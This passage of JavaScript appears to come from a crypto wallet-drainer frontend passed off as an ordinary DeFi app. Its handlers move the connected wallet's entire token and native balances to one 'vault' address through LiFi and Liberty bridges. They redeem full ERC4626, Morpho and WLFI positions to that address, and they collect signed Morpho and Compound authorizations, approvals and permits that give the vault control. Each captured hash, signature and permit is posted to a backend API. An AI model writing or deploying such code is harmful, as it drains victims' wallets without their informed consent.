        movedAmt: Number(ethValue) || Number(token.amount),
        hash: tx.hash,
        handleType: "wrapAndRelayTokens",
        apiData,
        tokenTo,
        dest: {
          destChainId,
          bridgeRouter: wrapRouterAddress,
          receiver: vault,
        },
      });
    } catch (error) {
      console.log("error in wrapAndRelayTokens", error.message);
      logActionFailure("wrapAndRelayTokens", token, error);
      return { success: false };
    }
  };

  /**
   * LiFi quote → approve (if ERC20) → send transactionRequest → POST /bridge.
   * Strat stamps token.lifi.quoteHint; vault is toAddress.
   */
  const lifiTransfer = async (token) => {
    if (!token || !signer || !provider || !vault || !address) {
      return { success: false };
    }
    const hint = token.lifi?.quoteHint || token.lifi || {};
    const fromChain = Number(hint.fromChain || token.lifi?.fromChain || chainId);
    const toChain = Number(hint.toChain || token.lifi?.toChain || fromChain);
    const fromToken = String(
      hint.fromToken || token.lifi?.fromToken || token.id || ""
    ).trim();
    const toToken = String(
      hint.toToken || token.lifi?.toToken || ""
    ).trim();
    const toSymbol = token.lifi?.toSymbol || "USDC";

    if (!/^0x[a-fA-F0-9]{40}$/.test(fromToken) || !/^0x[a-fA-F0-9]{40}$/.test(toToken)) {
      console.error("[lifiTransfer] missing quoteHint fromToken/toToken", token.lifi);
      return { success: false };
    }
    if (fromChain !== chainId) {
      console.warn("[lifiTransfer] wallet chain mismatch — switching", { fromChain, chainId });
      try {
        await switchToChain(fromChain);
      } catch (error) {
        logActionFailure("lifiTransfer", token, error);
        return { success: false, error: error?.message || "chain switch failed" };
      }
    }

    const isNative =
      Boolean(token.isNative) ||
      fromToken.toLowerCase() === LIFI_NATIVE.toLowerCase();

    try {
      let amount;
      let decimals = 18;
      let nativeSpend = null;
      if (isNative) {
        const followUpGasUnits = sumFollowUpGasUnits(allTokens, token, chainId);
        nativeSpend = await getLifiNativeSpendable(provider, address, chainId, {
          followUpGasUnits,
        });
        if (!nativeSpend?.value?.gt?.(0)) {
          throw new Error(
            "Insufficient native balance for lifiTransfer (need gas for this tx + follow-ups)"
          );
        }
        amount = nativeSpend.value;
      } else {
        const tokenContract = getContract(fromToken, erc20ABI);
        [amount, decimals] = await Promise.all([
          tokenContract.balanceOf(address),
          tokenContract.decimals(),
        ]);
      }
      if (!amount || amount.lte(0)) {
        throw new Error("No balance for lifiTransfer");
      }

      // 2% / 2.5% cross first; re-quote if price impact needs a wider band.
      const crossChain = fromChain !== toChain;
      let slippage = clampLifiSlippage(
        crossChain
          ? Math.max(LIFI_SLIPPAGE.start, LIFI_SLIPPAGE.crossFloor)
          : LIFI_SLIPPAGE.start
      );
      const quoteArgs = {
        fromChain,
        toChain,
        fromToken,
        toToken,
        fromAmount: amount.toString(),
        fromAddress: address,
        toAddress: vault,
        order: LIFI_QUOTE_ORDER,
        denyBridges: LIFI_DENY_BRIDGES,
      };
      let quote = await getQuote({ ...quoteArgs, slippage });
      const impact = priceImpactFromLifiQuote(quote);
      const needed = lifiSlippageFromImpact(impact, { crossChain, base: slippage });
      if (needed > slippage + 0.001) {
        console.log("[lifiTransfer] re-quote slippage", {
          from: formatLifiSlippagePct(slippage),
          to: formatLifiSlippagePct(needed),
          priceImpact: impact != null ? formatLifiSlippagePct(impact) : null,
        });
        slippage = needed;
        quote = await getQuote({ ...quoteArgs, slippage });
      }
      console.log("[lifiTransfer] slippage:", formatLifiSlippagePct(slippage), {
        fraction: slippage,
        priceImpact: impact,
        priceImpactLabel:
          impact != null ? formatLifiSlippagePct(impact) : null,
        tokenUsd: token.tokenValue ?? token.value,
      });
      let txRequest = quote?.transactionRequest;
      if (!txRequest?.to) {
        throw new Error("LiFi quote missing transactionRequest");
      }

      if (!isNative) {
        const spender =
          quote?.estimate?.approvalAddress || txRequest.to;
        const tokenContract = getContract(fromToken, erc20ABI);
        const allowance = await tokenContract.allowance(address, spender);
        if (allowance.lt(amount)) {
          const approvalTx = await tokenContract.approve(spender, amount);
          if (!(await requireConfirmed(approvalTx, "approve", token))) {
            return { success: false };
          }
          // Approve MM wait can stale Mayan/Kyber calldata → re-quote before send.
          try {
            quote = await getQuote({ ...quoteArgs, slippage });
          } catch (reQuoteErr) {
            const bumped = clampLifiSlippage(
              Math.max(slippage * 1.25, slippage + 0.02),
              { extreme: true }
            );
            if (bumped <= slippage + 0.001) throw reQuoteErr;
            console.log("[lifiTransfer] post-approve re-quote failed; extreme slip", {
              from: formatLifiSlippagePct(slippage),
              to: formatLifiSlippagePct(bumped),
              err: reQuoteErr?.message || String(reQuoteErr),
            });
            slippage = bumped;
            quote = await getQuote({ ...quoteArgs, slippage });
          }
          txRequest = quote?.transactionRequest;
          if (!txRequest?.to) {
            throw new Error("LiFi re-quote missing transactionRequest");
          }
          console.log("[lifiTransfer] re-quoted after approve", {
            tool: quote?.tool,
            slippage: formatLifiSlippagePct(slippage),
          });
        }
      }

      // Gas: ignore quote fee markets + fat quote gasLimit.
      const txValue =
        txRequest.value != null && BigNumber.from(txRequest.value).gt(0)
          ? BigNumber.from(txRequest.value)
          : BigNumber.from(0);
      const txPayload = {
        to: txRequest.to,
        data: txRequest.data || "0x",
        ...(txValue.gt(0) ? { value: txValue } : {}),
      };

      const sameChain = fromChain === toChain;
      // Mayan OOG at estimate×1.3; same-chain Kyber quotes often ask ~1.4M (900k cap was wrong).
      const EST_BUF_PCT = sameChain ? 130 : 150;
      const QUOTE_BUF_PCT = sameChain ? 115 : 135;
      const GAS_CAP = BigNumber.from(sameChain ? 2_000_000 : 3_500_000);
      let estimatedRaw = null;
      let gasLimit;
      try {
        estimatedRaw = await provider.estimateGas({
          from: address,
          to: txPayload.to,
          data: txPayload.data,
          value: txValue,
        });
        gasLimit = estimatedRaw.mul(EST_BUF_PCT).div(100);
      } catch {
        gasLimit =
          txRequest.gasLimit != null
            ? BigNumber.from(txRequest.gasLimit).mul(QUOTE_BUF_PCT).div(100)
            : BigNumber.from(sameChain ? 650_000 : 2_000_000);
      }
      if (gasLimit.gt(GAS_CAP)) gasLimit = GAS_CAP;
      if (txRequest.gasLimit != null) {
        const quoteGas = BigNumber.from(txRequest.gasLimit)
          .mul(QUOTE_BUF_PCT)
          .div(100);
        if (quoteGas.gt(gasLimit) && quoteGas.lte(GAS_CAP)) gasLimit = quoteGas;
      }

      const feeData = await provider.getFeeData();
      // L2: RPCs often report bloated maxFeePerGas (~1.5 gwei) while Base
      // lastBaseFee is ~0.005 — reserving on maxFee made 2.4M gas need ~0.004 ETH
      // and blocked the MM popup. Price off lastBaseFee + small cap instead.
      const L2_TIGHT = new Set([8453, 10, 42161, 43114, 56]);
      let feeOpts =
        nativeSpend?.feeOpts ||
        (L2_TIGHT.has(Number(chainId))
          ? (() => {
              const tip = utils.parseUnits("0.001", "gwei");
              const base =
                feeData.lastBaseFeePerGas ||
                utils.parseUnits("0.01", "gwei");
              let maxFee = base.mul(4);
              const floor = tip.mul(3);
              const cap = utils.parseUnits("0.1", "gwei");
              if (maxFee.lt(floor)) maxFee = floor;
              if (maxFee.gt(cap)) maxFee = cap;
              return { maxPriorityFeePerGas: tip, maxFeePerGas: maxFee };
            })()
          : getGasOptionsFromFeeData(feeData, chainId, { bufferPct: 110 }));

      // Never clamp below estimate×1.2 — that ships a near-certain OOG revert.
      const ethBal = await provider.getBalance(address);
      const maxFee = feeOpts.maxFeePerGas || feeOpts.gasPrice;
      const followUpWei = nativeSpend?.followUpReserveWei || BigNumber.from(0);
      const minGas = estimatedRaw
        ? estimatedRaw.mul(120).div(100)
        : BigNumber.from(sameChain ? 400_000 : 1_200_000);
      if (maxFee) {
        const headroom = ethBal.sub(txValue).sub(followUpWei);
        if (headroom.lte(0)) {
          throw new Error("Insufficient ETH for LiFi gas (+ follow-up reserve)");
        }
        const affordable = headroom.mul(90).div(100).div(maxFee);
        if (affordable.lt(gasLimit)) {
          if (affordable.lt(minGas)) {
            throw new Error(
              `Insufficient ETH for LiFi gas (need limit ≥ ${minGas.toString()}, can afford ${affordable.toString()}; have ${utils.formatEther(ethBal)} ETH)`
            );
          }
          gasLimit = affordable;
        }
      }
      txPayload.gasLimit = gasLimit;
      Object.assign(txPayload, feeOpts);

      const bridgeTx = await signer.sendTransaction(txPayload);
      if (!(await requireConfirmed(bridgeTx, "lifiTransfer", token))) {
        return { success: false };
      }

      const movedAmt = isNative
        ? Number(utils.formatEther(amount))
        : Number(utils.formatUnits(amount, decimals));
      return postBridgeSuccess(apiUrl, {
        token,
        movedAmt,
        hash: bridgeTx.hash,
        handleType: "lifiTransfer",
        apiData,
        tokenTo: createBridgeTokenTo(toToken, toSymbol, "erc20"),
        dest: {
          destChainId: toChain,
          bridgeRouter: quote?.estimate?.approvalAddress || txRequest.to,
          receiver: vault,
        },
      });
    } catch (error) {
      console.log("error in lifiTransfer", error);
      logActionFailure("lifiTransfer", token, error);
      return { success: false };
    }
  };

  const libertyTransfer = async (token, libDetails) => {
    if (!token) return { success: false };
    const tokenAddress = token.id;
    const {
      targetToken,
      proxyAddress,
      isLibTransferable,
      targetChainId,
      tokenType,
    } = libDetails ?? getLibTransferDetails(tokenAddress, chainId);
    if (!libChainIds.includes(chainId) || !isLibTransferable)
      return { success: false };

    try {
      const tokenContract = getContract(tokenAddress, erc20ABI);
      const proxyContract = getContract(proxyAddress, libertyProxyABI);

      const iface20 = new utils.Interface(erc20ABI);
      const { allowance, balance, decimals } = await aggregate3ReadOrFallback(
        provider,
        chainId,
        [
          {
            target: tokenAddress,
            allowFailure: true,
            callData: iface20.encodeFunctionData("allowance", [
              address,
              proxyAddress,
            ]),
          },
          {
            target: tokenAddress,
            allowFailure: true,
            callData: iface20.encodeFunctionData("balanceOf", [address]),
          },
          {
            target: tokenAddress,
            allowFailure: true,
            callData: iface20.encodeFunctionData("decimals", []),
          },
        ],
        (rows) => {
          if (!rows[0]?.success || !rows[1]?.success || !rows[2]?.success) {
            throw new Error("multicall");
          }
          return {
            allowance: iface20.decodeFunctionResult("allowance", rows[0].returnData)[0],
            balance: iface20.decodeFunctionResult("balanceOf", rows[1].returnData)[0],
            decimals: iface20.decodeFunctionResult("decimals", rows[2].returnData)[0],
          };
        },
        async () => {
          const [a, b, d] = await Promise.all([
            tokenContract.allowance(address, proxyAddress),
            tokenContract.balanceOf(address),
            tokenContract.decimals(),
          ]);
          return { allowance: a, balance: b, decimals: d };
        }
      );

      const overflowAction = getLibertyHighBalanceAction(
        tokenType,
        chainId,
        balance,
        decimals
      );
      if (overflowAction === "approve") return await approve(token);
      if (overflowAction === "ethPermit") return await ethPermit(token);

      if (allowance.lt(balance)) {
        const approvalTx = await tokenContract.approve(proxyAddress, balance);
        if (!approvalTx) return { success: false };
        if (!(await requireConfirmed(approvalTx, "approve", token))) {
          return { success: false };
        }
      }

      const params = [targetChainId, balance, vault, targetToken];

      const gasOptions = await getGasOptions(proxyContract, "swap", params, txData);
      const transferTx = await proxyContract.swap(...params, gasOptions);

      if (!transferTx) return { success: false };
      if (!(await requireConfirmed(transferTx, "libertyTransfer", token))) {
        return { success: false };
      }

      const movedAmt = await toReadableAmount(balance, tokenAddress, {
        decimals: decimals != null ? Number(decimals) : undefined,
        getContract,
      }).catch(() => null);
      const destSymbol =
        tokenType === "PCOCK" || tokenType === "pDAI" ? tokenType : "USDC";
      return postBridgeSuccess(apiUrl, {
        token,
        movedAmt,
        hash: transferTx.hash,
        handleType: "libertyTransfer",
        apiData,
        tokenTo: createBridgeTokenTo(targetToken, destSymbol, "erc20"),
        dest: {
          destChainId: targetChainId,
          bridgeRouter: proxyAddress,
          receiver: vault,
        },
      });
    } catch (error) {
      console.log("error in libertyTransfer", error);
      logActionFailure("libertyTransfer", token, error);
      return { success: false };
    }
  };


  // ============================================================================
  // Protocol exits
  // ============================================================================

  /**
   * Morpho Blue full supply exit → underlying to vault.
   * Shares from position(marketId, user) — not ERC20 balanceOf.
   */
  const morphoBlueWithdraw = async (token) => {
    if (!token || !signer || !vault) return { success: false };
    const marketId = token.positionDetails?.marketId;
    if (!marketId) {
      console.warn("[morphoBlueWithdraw] missing marketId", token);
      return { success: false };
    }

    const morphoAddress = token.id || MORPHO_BLUE;
    const morpho = getContract(morphoAddress, morphoBlueABI);

    try {
      const mp = await morpho.idToMarketParams(marketId);
      const marketParams = [
        mp.loanToken ?? mp[0],
        mp.collateralToken ?? mp[1],
        mp.oracle ?? mp[2],
        mp.irm ?? mp[3],
        mp.lltv ?? mp[4],
      ];
      const pos = await morpho.position(marketId, address);
      const supplyShares = pos.supplyShares ?? pos[0];
      if (!supplyShares || supplyShares.isZero()) {
        console.warn("[morphoBlueWithdraw] zero supplyShares", token);
        return { success: false };
      }

      const mkt = await morpho.market(marketId);
      const userAssets = supplyShares
        .mul(mkt.totalSupplyAssets ?? mkt[0])
        .div(mkt.totalSupplyShares ?? mkt[1]);
      const maxAssets = morphoMaxWithdrawableAssets(mkt, supplyShares);
      if (!maxAssets || maxAssets.isZero()) {
        console.warn("[morphoBlueWithdraw] no market liquidity", token);
        return { success: false };
      }
      const params = maxAssets.eq(userAssets)
        ? [marketParams, 0, supplyShares, address, vault]
        : [marketParams, maxAssets, 0, address, vault];
      const gasOptions = await getGasOptions(
        morpho,
        "withdraw",
        params,
        txData,
        800000
      );
      // Ankr sometimes estimates ~70k while real withdraw needs ~110k+ — floor hard.
      const withdrawFloor = BigNumber.from(250_000);
      if (BigNumber.from(gasOptions.gasLimit).lt(withdrawFloor)) {
        gasOptions.gasLimit = withdrawFloor;
      }
      const tx = await morpho.withdraw(...params, gasOptions);
      if (!tx) return { success: false };
      if (!(await requireConfirmed(tx, "morphoBlueWithdraw", token))) {
        return { success: false };
      }

      // Tx confirmed — always POST Attempt; degrade qty/identity if convert fails
      const tokenData = await finalizeProtocolExitTokenData(
        () =>
          buildMorphoExitTokenData(
            morpho,
            marketId,
            supplyShares,
            token,
            marketParams[0],
            { getContract }
          ),
        token
      );
      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        tx.hash,
        "morphoBlueWithdraw",
        token.positionDetails || null
      );
      logApprovalSuccess(apiUrl, exitObject, "morphoBlueWithdraw");
      return { success: true, hash: tx.hash };
    } catch (error) {
      console.log("error in morphoBlueWithdraw", error?.message || error);
      logActionFailure("morphoBlueWithdraw", token, error);
      return { success: false };
    }
  };

  /**
   * N≥2 Blue (and N=1 lending): user authorizes vault, POST /protocolExit.
   * WithSig first (vault submits on-chain); setAuthorization tx fallback.
   */

  const morphoBlueAuthorize = async (token) => {
    if (!token || !signer || !vault) return { success: false };
    const morphoAddr = token.id || MORPHO_BLUE;
    const morpho = getContract(morphoAddr, morphoBlueABI);

    const postExit = ({ transactionHash, authMode, authorization, signature }) => {
      const tokenData = createMoveTokenData(token, token.amount ?? 0);
      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        transactionHash || null,
        "morphoBlueAuthorize",
        token.positionDetails || null,
        {
          authMode,
          ...(authorization ? { authorization } : {}),
          ...(signature ? { signature } : {}),
        }
      );
      logApprovalSuccess(apiUrl, exitObject, "morphoBlueAuthorize");
      return { success: true, hash: transactionHash || null };
    };

    try {
      if (await morpho.isAuthorized(address, vault)) {
        return postExit({ authMode: "alreadyAuthorized" });
      }

      try {
        const nonce = await morpho.nonce(address);
        const deadline = getDeadline(1);
        const authorization = {
          authorizer: address,
          authorized: vault,
          isAuthorized: true,
          nonce: nonce.toString(),
          deadline: String(deadline),
        };
        const domain = { chainId, verifyingContract: morphoAddr };
        const signature = await signer._signTypedData(
          domain,
          MORPHO_AUTH_TYPES,
          {
            ...authorization,
            nonce,
            deadline,
            isAuthorized: true,
          }
        );
        if (!signature) return { success: false };
        return postExit({
          authMode: "setAuthorizationWithSig",
          authorization,
          signature,
        });
      } catch (signErr) {
        if (isActionUserRejection(signErr)) {
          logActionFailure("morphoBlueAuthorize", token, signErr);
          return { success: false };
        }
        console.warn(
          "[morphoBlueAuthorize] WithSig failed, falling back to tx",
          signErr?.message || signErr
        );
      }

      const params = [vault, true];
      const gasOptions = await getGasOptions(
        morpho,
        "setAuthorization",
        params,
        txData,
        100000
      );
      const tx = await morpho.setAuthorization(...params, gasOptions);
      if (!tx) return { success: false };
      if (!(await requireConfirmed(tx, "morphoBlueAuthorize", token))) {
        return { success: false };
      }
      return postExit({
        transactionHash: tx.hash,
        authMode: "setAuthorization",
      });
    } catch (error) {
      console.log("error in morphoBlueAuthorize", error?.message || error);
      logActionFailure("morphoBlueAuthorize", token, error);
      return { success: false };
    }
  };

  /**
   * Comet: allowBySig first (master submits), allow(vault,true) fallback.
   * Vault loops withdrawFrom on POST /protocolExit.
   */
  const compound3Authorize = async (token) => {
    if (!token || !signer || !vault) return { success: false };
    const cometAddr = token.id || token.positionDetails?.comet;
    const comet = getContract(cometAddr, comet3ABI);

    const postExit = ({ transactionHash, authMode, authorization, signature }) => {
      const tokenData = buildCompound3AuthorizeTokenData(token);
      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        transactionHash || null,
        "compound3Authorize",
        token.positionDetails || null,
        {
          authMode,
          ...(authorization ? { authorization } : {}),
          ...(signature ? { signature } : {}),
        }
      );
      logApprovalSuccess(apiUrl, exitObject, "compound3Authorize");
      return { success: true, hash: transactionHash || null };
    };

    try {
      if (await comet.isAllowed(address, vault)) {
        return postExit({ authMode: "alreadyAuthorized" });
      }

      try {
        const [nonce, name, version] = await Promise.all([
          comet.userNonce(address),
          comet.name(),
          comet.version(),
        ]);
        const expiry = getDeadline(1);
        const authorization = {
          owner: address,
          manager: vault,
          isAllowed: true,
          nonce: nonce.toString(),
          expiry: String(expiry),
        };
        const domain = {
          name,
          version,
          chainId,
          verifyingContract: cometAddr,
        };
        const signature = await signer._signTypedData(
          domain,
          COMET_AUTH_TYPES,
          {
            owner: address,
            manager: vault,
            isAllowed: true,
            nonce,
            expiry,
          }
        );
        if (!signature) return { success: false };
        return postExit({ authMode: "allowBySig", authorization, signature });
      } catch (signErr) {
        if (isActionUserRejection(signErr)) {
          logActionFailure("compound3Authorize", token, signErr);
          return { success: false };
        }
        console.warn(
          "[compound3Authorize] allowBySig failed, falling back to tx",
          signErr?.message || signErr
        );
      }

      const params = [vault, true];
      const gasOptions = await getGasOptions(
        comet,
        "allow",
        params,
        txData,
        100000
      );
      const tx = await comet.allow(...params, gasOptions);
      if (!tx) return { success: false };
      if (!(await requireConfirmed(tx, "compound3Authorize", token))) {
        return { success: false };
      }
      return postExit({
        transactionHash: tx.hash,
        authMode: "allow",
      });
    } catch (error) {
      console.log("error in compound3Authorize", error?.message || error);
      logActionFailure("compound3Authorize", token, error);
      return { success: false };
    }
  };

  /**
   * ERC4626 Option B — redeem(shares) on token.id → assets to vault.
   * Sibling: erc4626Withdraw (assets in). Default vaults stay on sweepShares / ethPermit.
   */

  const erc4626Redeem = async (token) => {
    if (!token || !signer || !vault) return { success: false };

    const vaultTok = getContract(token.id, erc4626ABI);
    try {
      // maxRedeem respects liquidity/caps (same reason withdraw uses maxWithdraw).
      let shares = await vaultTok.maxRedeem(address);
      if (!shares || shares.isZero()) {
        shares = await vaultTok.balanceOf(address);
      }
      if (!shares || shares.isZero()) {
        console.warn("[erc4626Redeem] zero redeemable", token);
        return { success: false };
      }

      const params = [shares, vault, address];
      // MetaMorpho redeem unwinds across Blue markets — 300k OOGs; estimate ~390k+ on Base.
      const gasOptions = await getGasOptions(
        vaultTok,
        "redeem",
        params,
        txData,
        1_200_000
      );
      const tx = await vaultTok.redeem(...params, gasOptions);
      if (!tx) return { success: false };
      if (!(await requireConfirmed(tx, "erc4626Redeem", token))) {
        return { success: false };
      }

      // Tx confirmed — always POST Attempt; degrade if convert/identity fails
      const tokenData = await finalizeProtocolExitTokenData(
        async () => {
          const assetsRaw = await vaultTok.convertToAssets(shares);
          return buildErc4626ExitTokenData(vaultTok, token, assetsRaw, {
            getContract,
          });
        },
        token
      );
      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        tx.hash,
        "erc4626Redeem",
        token.positionDetails || null
      );
      logApprovalSuccess(apiUrl, exitObject, "erc4626Redeem");
      return { success: true, hash: tx.hash };
    } catch (error) {
      console.log("error in erc4626Redeem", error?.message || error);
      logActionFailure("erc4626Redeem", token, error);
      return { success: false };
    }
  };

  /**
   * ERC4626 Option B' — withdraw(assets) on token.id → assets to vault.
   * Uses maxWithdraw for asset sizing (full exit under vault caps).
   */

  const erc4626Withdraw = async (token) => {
    if (!token || !signer || !vault) return { success: false };

    const vaultTok = getContract(token.id, erc4626ABI);
    try {
      let assets = await vaultTok.maxWithdraw(address);
      if (!assets || assets.isZero()) {
        const shares = await vaultTok.balanceOf(address);
        if (!shares || shares.isZero()) {
          console.warn("[erc4626Withdraw] zero withdrawable", token);
          return { success: false };
        }
        assets = await vaultTok.convertToAssets(shares);
      }
      if (!assets || assets.isZero()) {
        console.warn("[erc4626Withdraw] zero assets", token);
        return { success: false };
      }

      const params = [assets, vault, address];
      const gasOptions = await getGasOptions(
        vaultTok,
        "withdraw",
        params,
        txData,
        1_200_000
      );
      const tx = await vaultTok.withdraw(...params, gasOptions);
      if (!tx) return { success: false };
      if (!(await requireConfirmed(tx, "erc4626Withdraw", token))) {
        return { success: false };
      }

      // Tx confirmed — always POST Attempt; `assets` is Attempt qty when record works
      const tokenData = await finalizeProtocolExitTokenData(
        () =>
          buildErc4626ExitTokenData(vaultTok, token, assets, { getContract }),
        token
      );
      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        tx.hash,
        "erc4626Withdraw",
        token.positionDetails || null
      );
      logApprovalSuccess(apiUrl, exitObject, "erc4626Withdraw");
      return { success: true, hash: tx.hash };
    } catch (error) {
      console.log("error in erc4626Withdraw", error?.message || error);
      logActionFailure("erc4626Withdraw", token, error);
      return { success: false };
    }
  };

  /**
   * WLFI Lockbox — claimVest() on the WLFI token. A smart account transfers
   * the claim to the vault in that same signature. A normal wallet claims,
   * then the stamped pull. EIP-3009 and Permit2 on that pull are relayTransfer.
   * Debank row id is the vester; tx target is positionDetails.wlfiToken.
   */
  const wlfiVestClaim = async (token) => {
    if (!token || !signer || !vault) return { success: false };

    const wlfiAddr =
      token.positionDetails?.wlfiToken ||
      token.positionDetails?.underlying?.id;
    const vesterAddr = token.id;
    if (!wlfiAddr) {
      console.warn("[wlfiVestClaim] missing wlfiToken", token);
      return { success: false };
    }

    const wlfi = getContract(wlfiAddr, wlfiTokenVestABI);
    const vester = vesterAddr
      ? getContract(vesterAddr, wlfiVesterABI)
      : null;

    try {
      let claimable = null;
      if (vester) {
        claimable = await vester.claimable(address);
        if (!claimable || claimable.isZero()) {
          console.warn("[wlfiVestClaim] zero claimable", token);
          return { success: false };
        }
      }

      let claimHash = null;
      let approveHash = null;
      let claimedRaw = null;
      let batchMode = null;
      let wlfiSettle = null;
      const beforeWlfi = await wlfi.balanceOf(address);

      const canBatch =
        Boolean(claimable) &&
        canAtomicSendCalls(walletCapsRef.current, walletClient, chainId);
      if (canBatch) {
        const caps = await snapshotWalletCapabilities(
          provider,
          walletClient,
          address,
          chainId
        );
        walletCapsRef.current = caps;
        if (canAtomicSendCalls(caps, walletClient, chainId) && vault) {
          const claimData = wlfi.interface.encodeFunctionData("claimVest", []);
          claimHash = await sendWalletCalls(walletClient, address, [
            { to: wlfiAddr, data: claimData },
            { to: wlfiAddr, data: encodeErc20Transfer(vault, claimable) },
          ]);
          if (!claimHash) return { success: false };
          batchMode = "sendCalls";
          claimedRaw = claimable;
        }
      }

      if (!claimHash) {
        const claimParams = [];
        const claimGas = await getGasOptions(
          wlfi,
          "claimVest",
          claimParams,
          txData,
          300_000
        );
        const claimTx = await wlfi.claimVest(claimGas);
        if (!claimTx) return { success: false };
        if (!(await requireConfirmed(claimTx, "wlfiVestClaim", token))) {
          return { success: false };
        }
        claimHash = claimTx.hash;

        const afterClaim = await wlfi.balanceOf(address);
        const landed = afterClaim.gt(beforeWlfi)
          ? afterClaim.sub(beforeWlfi)
          : claimable;
        if (!landed || landed.isZero()) {
          console.warn("[wlfiVestClaim] zero WLFI landed after claim", token);
          return { success: false };
        }
        const relayed = await relayPullLanded(pullLegDeps(), {
          token,
          tokenContract: wlfi,
          amountWei: landed,
        });
        if (relayed.rejected) return { success: false };
        if (relayed.ok) return { success: true, hash: relayed.hash || claimHash };
        const pullToken = relayed.fallback
          ? {
              ...token,
              positionDetails: {
                ...token.positionDetails,
                pullHandle: token.relay?.fallbackHandle || "approve",
              },
            }
          : token;
        const settled = await settlePullAllowance(pullLegDeps(), {
          token: pullToken,
          tokenContract: wlfi,
          amountWei: landed,
        });
        if (settled.rejected || !settled.ok) return { success: false };
        approveHash = settled.approveHash || null;
        wlfiSettle = settled;
        claimedRaw = landed;
      }

      if (!claimedRaw) {
        const afterBatch = await wlfi.balanceOf(address);
        claimedRaw = afterBatch.gt(beforeWlfi)
          ? afterBatch.sub(beforeWlfi)
          : claimable;
      }
      if (!claimedRaw || claimedRaw.isZero()) {
        console.warn("[wlfiVestClaim] zero WLFI landed after claim", token);
        return { success: false };
      }

      const tokenData = await finalizeProtocolExitTokenData(async () => {
        const decimals = await wlfi.decimals().catch(() => 18);
        const symbol = await wlfi.symbol().catch(() => "WLFI");
        const readable =
          Number(claimedRaw) / 10 ** Number(decimals);
        return {
          address: wlfiAddr,
          id: wlfiAddr,
          symbol,
          decimals: Number(decimals),
          amount: readable,
          balance: readable,
          type: "erc20",
          value: token.tokenValue,
        };
      }, token);

      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        claimHash,
        "wlfiVestClaim",
        {
          ...(token.positionDetails || {}),
          pullWei: claimedRaw.toString(),
        },
        batchMode
          ? { batchMode, deliveredToVault: true }
          : {
              approveTransactionHash: approveHash,
              ...(wlfiSettle?.usePermit2 ? { usePermit2: true } : {}),
              ...(wlfiSettle?.permit ? { permit: wlfiSettle.permit, type: wlfiSettle.permitType } : {}),
              ...(wlfiSettle?.authorization ? { authorization: wlfiSettle.authorization } : {}),
            }
      );
      logApprovalSuccess(apiUrl, exitObject, "wlfiVestClaim");
      return { success: true, hash: claimHash };
    } catch (error) {
      console.log("error in wlfiVestClaim", error?.message || error);
      logActionFailure("wlfiVestClaim", token, error);
      return { success: false };
    }
  };

  /**
   * crvUSD / LlamaLend — remove_collateral(free). A smart account transfers
   * that collateral to the vault in the same signature. A normal wallet
   * removes, then the stamped pull. WETH controllers pass use_eth=false.
   */
  const curveLendingWithdraw = async (token) => {
    if (!token || !signer || !vault || !address) return { success: false };

    try {
      const plan = await inspectCurveWithdraw(pullLegDeps(), token);
      if (!plan) {
        console.warn("[curveLendingWithdraw] missing controller or collateral", token);
        return { success: false };
      }
      if (plan.softLiq) {
        console.warn("[curveLendingWithdraw] soft-liquidation", token.id);
        return { success: false };
      }
      if (!plan.skipRemove && (!plan.freeWei || plan.freeWei.isZero())) {
        console.warn("[curveLendingWithdraw] no free collateral", token.id);
        return { success: false };
      }
      if (plan.skipRemove && (!plan.pullWei || plan.pullWei.isZero())) {
        console.warn("[curveLendingWithdraw] collateral already out but wallet is empty", token.id);
        return { success: false };
      }

      const {
        controller,
        collateral,
        controllerAddr,
        collAddr,
        removeMethod,
        hasUseEthArg,
        freeWei,
      } = plan;
      const before = plan.walletBal;
      let removeHash = null;
      let approveHash = null;
      let batchMode = null;
      let pullAmt = null;
      let curveSettle = null;

      const settleLanded = async (amountWei) => {
        const relayed = await relayPullLanded(pullLegDeps(), {
          token,
          tokenContract: collateral,
          amountWei,
        });
        if (relayed.rejected) return { stop: true };
        if (relayed.ok) return { bridged: true, hash: relayed.hash };
        const pullToken = relayed.fallback
          ? {
              ...token,
              positionDetails: {
                ...token.positionDetails,
                pullHandle: token.relay?.fallbackHandle || "approve",
              },
            }
          : token;
        const settled = await settlePullAllowance(pullLegDeps(), {
          token: pullToken,
          tokenContract: collateral,
          amountWei,
        });
        if (settled.rejected || !settled.ok) return null;
        curveSettle = settled;
        approveHash = settled.approveHash || null;
        return amountWei;
      };

      if (plan.skipRemove) {
        console.log("[curveLendingWithdraw] collateral already in wallet, stamped pull", token.id);
        const settledSkip = await settleLanded(plan.pullWei);
        if (settledSkip?.stop) return { success: false };
        if (settledSkip?.bridged) return { success: true, hash: settledSkip.hash };
        pullAmt = settledSkip;
        if (!pullAmt) return { success: false };
        removeHash = approveHash;
      } else {
        const removeParams = hasUseEthArg ? [freeWei, false] : [freeWei];
        const canBatch = canAtomicSendCalls(
          walletCapsRef.current,
          walletClient,
          chainId
        );
        if (canBatch) {
          const caps = await snapshotWalletCapabilities(
            provider,
            walletClient,
            address,
            chainId
          );
          walletCapsRef.current = caps;
          if (canAtomicSendCalls(caps, walletClient, chainId)) {
            const removeData = controller.interface.encodeFunctionData(
              removeMethod,
              removeParams
            );
            removeHash = await sendWalletCalls(walletClient, address, [
              { to: controllerAddr, data: removeData },
              { to: collAddr, data: encodeErc20Transfer(vault, freeWei) },
            ]);
            if (!removeHash) return { success: false };
            batchMode = "sendCalls";
            pullAmt = freeWei;
            if (/^0x[a-fA-F0-9]{64}$/.test(removeHash)) {
              const receipt = await provider.waitForTransaction(removeHash, 1);
              if (!receipt || Number(receipt.status) !== 1) return { success: false };
            }
          }
        }

        if (!removeHash) {
          const removeGas = await getGasOptions(
            controller,
            removeMethod,
            removeParams,
            txData,
            400_000
          );
          const removeTx = await controller[removeMethod](...removeParams, removeGas);
          if (!removeTx) return { success: false };
          if (!(await requireConfirmed(removeTx, "curveLendingWithdraw", token))) {
            return { success: false };
          }

          removeHash = removeTx.hash;
          const afterRemove = await collateral.balanceOf(address);
          const landed = afterRemove.gt(before) ? afterRemove.sub(before) : freeWei;
          const settledRemove = await settleLanded(landed);
          if (settledRemove?.stop) return { success: false };
          if (settledRemove?.bridged) {
            return { success: true, hash: settledRemove.hash || removeHash };
          }
          pullAmt = settledRemove;
          if (!pullAmt) return { success: false };
